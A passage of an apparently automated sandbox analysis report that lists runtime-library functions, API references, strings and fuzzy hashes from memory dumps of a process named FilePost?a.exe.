                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: " not used$AlgorithmParametersBase: parameter "
                                          • API String ID: 2659868963-612349224
                                          • Opcode ID: 1f9ccb5509fdef0b6fc2c74a87e404dd7d328543d913ed2aa491c35598f8b9f6
                                          • Instruction ID: 241da2eccefb1ae70c82b630c82dd1f412827eb93968c7025f6757edccccc728
                                          • Opcode Fuzzy Hash: 1f9ccb5509fdef0b6fc2c74a87e404dd7d328543d913ed2aa491c35598f8b9f6
                                          • Instruction Fuzzy Hash: 2A51D171904649AFCB10DFA4C800BAAFBF9EF09714F10865FE925D7A85E7F5A540CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D169BE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6D169C1F
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6D169CD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 3480331319-1018135373
                                          • Opcode ID: 6ca78c216f6fa19449cfee5d3b0becb0970905e95978c437c373f199569ea1b7
                                          • Instruction ID: 91db3e36f4b20f0dacc7d9ad5b5b337861a2fc011e1f3df5d69067f2cdc681fd
                                          • Opcode Fuzzy Hash: 6ca78c216f6fa19449cfee5d3b0becb0970905e95978c437c373f199569ea1b7
                                          • Instruction Fuzzy Hash: DC41D230A042499BCF10CF68D890AAEBBF5FF55328F018095ED249B359D7B5DA21CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D14A580 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D14A6A2
                                          Strings
                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6D14A622
                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6D14A5F4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___std_exception_copy
                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                          • API String ID: 2659868963-3345525433
                                          • Opcode ID: 7be429c1e28a95755db8cf39a2c4d1165ca79a0532eb29f5d580396c602cfd82
                                          • Instruction ID: f7b5eaf8c237bfecbc39d6c5eaeba51a725fced1b2323647f34c9b8b8d0a296a
                                          • Opcode Fuzzy Hash: 7be429c1e28a95755db8cf39a2c4d1165ca79a0532eb29f5d580396c602cfd82
                                          • Instruction Fuzzy Hash: DE41C6B1808649AFC710CFA4C944FEEF7B8FF14618F11862AE911E7645EBB4A554CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D179254 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                          • API String ID: 0-1657534680
                                          • Opcode ID: 1260ecea97a636c6f658471781a14b074789d1f38ec2280f1360b2d9c0475efd
                                          • Instruction ID: 8884e9abe2206443d2f60e8be8f8e9b5e44e6e0260e5ca4c6582ef84939a8c59
                                          • Opcode Fuzzy Hash: 1260ecea97a636c6f658471781a14b074789d1f38ec2280f1360b2d9c0475efd
                                          • Instruction Fuzzy Hash: 29410771A44215AFCB31DFA9D890EAEBBF8FF8A710F110066E614D7264D7F08A45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39D876 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D9CC
                                            • Part of subcall function 6E39BEF3: DName::DName.LIBVCRUNTIME ref: 6E39BF6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: Y9n$9n
                                          • API String ID: 1333004437-4080032062
                                          • Opcode ID: e3058c604b294b38ed0dfe32680511263dd8fc82bcc2cf3a70111bc97d7be708
                                          • Instruction ID: da7075e7c8174d111531564f661428456e4484676ac40ad42660e01341b627f6
                                          • Opcode Fuzzy Hash: e3058c604b294b38ed0dfe32680511263dd8fc82bcc2cf3a70111bc97d7be708
                                          • Instruction Fuzzy Hash: 924199B4D046089FDF05DFACC482BEDBBB9BB46314F644199D495A7290E7709A88CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16BBB3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D16BBD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: EncodePointer
                                          • String ID: MOC$RCC
                                          • API String ID: 2118026453-2084237596
                                          • Opcode ID: c86e2b471670a85978c18281efaca31c5d716d3075a08b93947e1f60e96386f5
                                          • Instruction ID: b28656489ef93790baf27040f63bad506197545f07e7cab335eb61942a53befe
                                          • Opcode Fuzzy Hash: c86e2b471670a85978c18281efaca31c5d716d3075a08b93947e1f60e96386f5
                                          • Instruction Fuzzy Hash: 19418A7190024AEFCF06CF94DE81AEE7BB5FF08304F158059FA1467259D7B59A60DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39CD91 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 6E39CE9D
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::shared_ptr
                                          • String ID: amp$cpu
                                          • API String ID: 2125921051-2542064945
                                          • Opcode ID: 49c51df95bcf2ecd10f75dd478176d1d6cbceb812e85ab4fbfabf1deee356172
                                          • Instruction ID: ba40b048060793293b3feb1889d0f0df3abe37f53639e58b671c546f4368a9ec
                                          • Opcode Fuzzy Hash: 49c51df95bcf2ecd10f75dd478176d1d6cbceb812e85ab4fbfabf1deee356172
                                          • Instruction Fuzzy Hash: 0031B2B5E002099FCF04CFE8C4A0AEEBBB9BF89315F50415AD456AF340EB319A44DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39EA85 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6E39AF9A: __EH_prolog3.LIBCMT ref: 6E39AFA1
                                          • DName::operator+.LIBCMT ref: 6E39EAE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: H_prolog3Name::operator+
                                          • String ID: CV: $Y9n
                                          • API String ID: 955633245-1151399619
                                          • Opcode ID: c528b362b63c3b9fdcfc64bec34accb8e7afed321788fd97a15e9b33e43abb08
                                          • Instruction ID: 2ce824a627067cc2e9bc64eeefae065ffc134da8aaf6c89198a8658f4cbd318b
                                          • Opcode Fuzzy Hash: c528b362b63c3b9fdcfc64bec34accb8e7afed321788fd97a15e9b33e43abb08
                                          • Instruction Fuzzy Hash: 6E3176B5A08206AFCB41DFADC441B9ABBF9BF49310F10816AE14AC7351E731E984EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D169AA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Offset
                                          • String ID: Bad dynamic_cast!
                                          • API String ID: 1587990502-2956939130
                                          • Opcode ID: 897ea7b1f4c6e6c10c763329a757cd2c80035a050ece61c40cb09dd0aead9bd6
                                          • Instruction ID: 8d625a8c99800e1e876bed82d663d59990b8c7267465ec765035139d71354f66
                                          • Opcode Fuzzy Hash: 897ea7b1f4c6e6c10c763329a757cd2c80035a050ece61c40cb09dd0aead9bd6
                                          • Instruction Fuzzy Hash: E9210572A082869FCB04CF68DD25EAE77B5FB95324F158259EA109718CD7B0E921C7B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16F6F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: A
                                          • API String ID: 1333004437-3554254475
                                          • Opcode ID: 8a9d86928a19591292aa128f0f953ac487bdd253a1d95362d6d96d8d9e1ffd01
                                          • Instruction ID: 99c1dc66f578561ee5d247fe316077b2a63940b898e29ddef8fde9baa13ed94f
                                          • Opcode Fuzzy Hash: 8a9d86928a19591292aa128f0f953ac487bdd253a1d95362d6d96d8d9e1ffd01
                                          • Instruction Fuzzy Hash: F8219D7190828AEFCF05DFA8D940AEC7F72FB06344F018099E5259B258D7F0C5A1CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39B805 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::
                                          • String ID: A
                                          • API String ID: 1333004437-3554254475
                                          • Opcode ID: 47846d6f3b924e3ba113907c78c9ec8e9c8f3cb4bbc4987b16c4cc0ddb5462a1
                                          • Instruction ID: 542982a3babf9daa62af7d4bbff940e4e568795a5ca4a1c0595504134b0dd84c
                                          • Opcode Fuzzy Hash: 47846d6f3b924e3ba113907c78c9ec8e9c8f3cb4bbc4987b16c4cc0ddb5462a1
                                          • Instruction Fuzzy Hash: 6D219FB4908249EFDF04DFE8C440AFD7BBAFB49348F008499E4949F254E7758985EB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39A005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::Name::operator+=
                                          • String ID: void
                                          • API String ID: 2247604192-3531332078
                                          • Opcode ID: 67429fe50cff28c2f01293f1310b421c1668b8857eb62fdaa7e53cfc18ca724f
                                          • Instruction ID: a161697e045a1209843495161168314715cec5c2007fbfa2f0faece799ebc067
                                          • Opcode Fuzzy Hash: 67429fe50cff28c2f01293f1310b421c1668b8857eb62fdaa7e53cfc18ca724f
                                          • Instruction Fuzzy Hash: 5C214DB5C04219AFCB04DFE8C851AEE7BBCEF45314F00459AD551A7380FB759644DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6E39F85B
                                          • ___raise_securityfailure.LIBCMT ref: 6E39F943
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: |+uyo
                                          • API String ID: 3761405300-4244227617
                                          • Opcode ID: e197129c1887b9a21b76a423417770780ec3ed775ee91e3f4b384d00838822f9
                                          • Instruction ID: 7df8f5294e33e5603fefdb36fa663d8162d3c1299d11e8ab1613d5be61e6519e
                                          • Opcode Fuzzy Hash: e197129c1887b9a21b76a423417770780ec3ed775ee91e3f4b384d00838822f9
                                          • Instruction Fuzzy Hash: 3C21BEF8600B059ADB14CF5ED595A487BE8BB4A794F20916AE5048ABD0E3B494C8CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39862A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 6E398647
                                          • swprintf.LIBCMT ref: 6E39866A
                                            • Part of subcall function 6E39ED07: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6E39ED19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                          • String ID: %lf
                                          • API String ID: 391901838-2891890143
                                          • Opcode ID: 0d903e7480eb7a13d9a70f2b5c139fab0dbb4789d74aaa6aae46005535f6676a
                                          • Instruction ID: 5e83ad96fd5f1031c0d707ac5861b8a24de0935d109a46eb28e174d054c14c3c
                                          • Opcode Fuzzy Hash: 0d903e7480eb7a13d9a70f2b5c139fab0dbb4789d74aaa6aae46005535f6676a
                                          • Instruction Fuzzy Hash: DFF0CDB5500108BADB04ABD9DC49FFF7FACEF85298F014498F6841B140EB71AE10A3B6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39868A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 6E3986A3
                                          • swprintf.LIBCMT ref: 6E3986C6
                                            • Part of subcall function 6E39ED07: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6E39ED19
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                          • String ID: %lf
                                          • API String ID: 391901838-2891890143
                                          • Opcode ID: ac25438b24dec404f2ee3bd1551b07a5780fceb82417e5e661fe16727244ab21
                                          • Instruction ID: 507276e1f5c9d2735fcbce9ef2c746fa286f96b43dde371f34e9054035afbe54
                                          • Opcode Fuzzy Hash: ac25438b24dec404f2ee3bd1551b07a5780fceb82417e5e661fe16727244ab21
                                          • Instruction Fuzzy Hash: EFF024B5100008BADB006BD9CC48FFF3BACEF85298F01849CFA841B140EB31AE00A3B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1414F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D1414F5
                                            • Part of subcall function 6D1666AC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D1666B8
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 6D14151E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                          • String ID: string too long
                                          • API String ID: 1846318660-2556327735
                                          • Opcode ID: be6fb4051c306a6056559a08e80db9e532ec80748e0fc1cbe239c19713cc5280
                                          • Instruction ID: 8485fd3584cb19a3c75b1e22ee293d26ff37c809ea4b72d6554902e11d792b61
                                          • Opcode Fuzzy Hash: be6fb4051c306a6056559a08e80db9e532ec80748e0fc1cbe239c19713cc5280
                                          • Instruction Fuzzy Hash: E6E072B291030867C200DFA8EC01882B79DCF161283008226F748E7209E3B0E8A08BF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E39D632 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,??_C,00000004,?,6E39DA60,00000000,00000000,?,00000000), ref: 6E39D64B
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D674
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: NameName::strncmp
                                          • String ID: ??_C
                                          • API String ID: 3707088317-1959642359
                                          • Opcode ID: b82653afac343304dd429066c68c29838b62b7fbc947a83c46af5219a2f5a7ae
                                          • Instruction ID: 246946be113a5bc0c9c19609d29ff43b19c7210d511866c96038abcf38e168ba
                                          • Opcode Fuzzy Hash: b82653afac343304dd429066c68c29838b62b7fbc947a83c46af5219a2f5a7ae
                                          • Instruction Fuzzy Hash: 02E092B4944308BFEB019AACCC07FC9376DAB02758FC10010F90CAA180F3B2D994DA95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

